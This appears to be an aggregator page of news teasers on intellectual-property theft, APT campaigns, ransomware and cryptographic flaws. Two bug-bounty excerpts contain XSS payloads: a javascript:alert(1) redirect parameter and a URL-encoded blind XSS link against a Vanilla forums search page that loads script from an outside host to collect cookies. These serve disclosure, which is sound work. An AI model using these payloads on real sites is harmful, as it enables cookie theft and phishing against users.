China-linked APT Caught Pilfering Treasure Trove of IP

Researchers from Cybereason’s Nocturnus Team have uncovered a massive, highly successful, three-year-long campaign of intellectual property theft. The perpetrators were likely able to siphon hundreds of gigabytes worth of “sensitive proprietary information from technology and manufacturing...

U.S. Dept Of Defense: Rxss on █████████ via logout?service=javascript:alert(1)

Description: I found open redirect and xss Rxss at the ██████████ logout page, https://████/██████████/logout?service=https://google.com It also allows javascript URIs, leading to Xss Impact Attacker can trick users to visit malicious websites or can lead to phishing and many other type of attack...

Vanilla: BlIND XSS on https://open.vanillaforums.com

Hello sir My name is Mohit Kumar and i'm a security researcher i found a bug in your website knows as Blind xss just open this link -- https://open.vanillaforums.com/search?Search=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fhackerookie.xss.ht%3E%3C%2Fscript%3E --- i will recieve your cookies and ip too...

Securing Azure datacenters with continuous IoT/OT monitoring

Figure 1: Industrial cooling system for datacenters. As more intelligent devices and machinery become connected to the internet, Operational Technology OT and the Internet of Things IoT have become part of your enterprise network infrastructure—and a growing security risk. With every new factory...

Hackers Amp Up COVID-19 IP Theft Attacks

Attackers are looking to the healthcare space as a rich repository of intellectual property IP now more than ever, as critical research of COVID-19 therapeutics are developed and Pfizer, Moderna and other biotech firms begin to mass produce vaccines. Several incidents show that nation-states are...

Ransomware and IP Theft: Top COVID-19 Healthcare Security Scares

Healthcare cybersecurity threats have been under the spotlight this past year, in particular with the rise of COVID-19 and the budgetary and resource strains that has put on hospitals. Beau Woods, a Cyber Safety Innovation Fellow with the Atlantic Council, founder and CEO of Stratigos Security an...

Cybercriminals Batter Automakers With Ransomware, IP Theft Cyberattacks

Cybercriminals are recognizing that the data that automotive companies have to offer – from customer and employee personal identifiable information PII to financial data – is invaluable. Recently, one attacker installed a keystroke logger on the workstation of a car dealership’s finance specialis...

COVID-19 Vaccine-Maker Hit with Cyberattack, Data Breach

COVID-19 vaccine manufacturer Dr. Reddy’s Laboratories has shut down its plants in Brazil, India, Russia, the U.K. and the U.S. following a cyberattack, according to reports. The Indian company is the contractor for Russia’s “Sputinik V” COVID-19 vaccine, which is about to enter Phase 2 human...

Microsoft Insider Risk Management and Communication Compliance in Microsoft 365 now generally available

Microsoft Insider Risk Management and Communication Compliance in Microsoft 365—now generally available—help organizations address internal risks, such as IP theft or code of conduct policy violations. The new Microsoft Insider Risk Management solution helps to quickly identify, detect, and act o...

The Modern-Day Heist: IP Theft Techniques That Enable Attackers

The Great Train Robbery of 1963 in Buckinghamshire, U.K., was orchestrated by a gang of 15 robbers that devised and executed a well-laid-out plan over the course of several months. Fast-forward 56 years and we’re still seeing gangs of modern-day robbers orchestrating elaborate plans – only in 201...

ICEPick-3PC: A Sophisticated Adware That Collects Data En Masse

A strain of malware that spreads on the web via advertising platforms has mounted a large-scale, mass data harvesting campaign, opening up thousands of Android users to follow-on attacks. Researchers said it’s likely there’s an organized crime ring operating behind the scenes. Named ICEPick‐3PC b...

IEEE P1735 Encryption Is Broken—Flaws Allow Intellectual Property Theft

Researchers have uncovered several major weaknesses in the implementation of the Institute of Electrical and Electronics Engineers IEEE P1735 cryptography standard that can be exploited to unlock, modify or steal encrypted system-on-chip blueprints. The IEEE P1735 scheme was designed to encrypt...

US-CERT Warns of Crypto Bugs in IEEE Standard

Recent academic work focused on weak cryptographic protections in the implementation of the IEEE P1735 standard has been escalated to an alert published Friday by the Department of Homeland Security. DHS’ US-CERT warned the IEEE P1735 standard for encrypting electronic-design intellectual propert...

ProjectSauron APT On Par With Equation, Flame, Duqu

A state-sponsored APT platform on par with Equation, Flame and Duqu has been used since 2011 to spy on government agencies and other critical industries. Known as ProjectSauron, or Strider, the platform has all the earmarks of advanced attackers who covet stealth, and rely on a mix of zero-day...

DDoS Attacks a Cover for Financial Fraud, IP Theft

It’s difficult to imagine a noisier attack than a distributed denial-of-service attack. They’re an ever-present threat to banks and other businesses where the uptime of Web-based services is critical to customers and the well-being of an enterprise. And as a handful proved throughout 2013, they a...

Report Says Active Recovery Efforts Could Deter IP Theft By Foreign Attackers

An independent commission focused on the threat of intellectual property from U.S. companies says that between 50 percent and 80 percent of all IP theft originates in China and, in a new report, urges the government to take stronger action against government-sanctioned IP theft. The Commission on...

NSA Chief Says Today's Cyber Attacks Amount to 'Greatest Transfer of Wealth in History'

The general in charge of the National Security Agency on Monday said the lack of national cybersecurity leglislation is costing us big and amounting to what he believes is “the greatest transfer of wealth in history.” U.S. Army Gen. Keith B. Alexander urged politicians to stop stalling on approvi...

THC-ipv6 Toolkit – Attacking the IPV6 Protocol

THC-ipv6 Toolkit – Attacking the IPV6 Protocol A complete tool set to attack the inherent protocol weaknesses of IPV6 and ICMP6, and includes an easy to use packet factory library. Please note to get full access to all the available tools you need to develop IPV6 tools yourself or submit patches,...

Lessons from Chicago: Bad Policy, Not Geopolitics, Enables IP Theft

One thing that CME Group, the company that runs the Chicago Mercantile Exchange, wants to make perfectly clear is that it places a “high value on protecting its intellectual property and trade secrets.” That was the clear message from CME following the arrest of an employee for stealing company...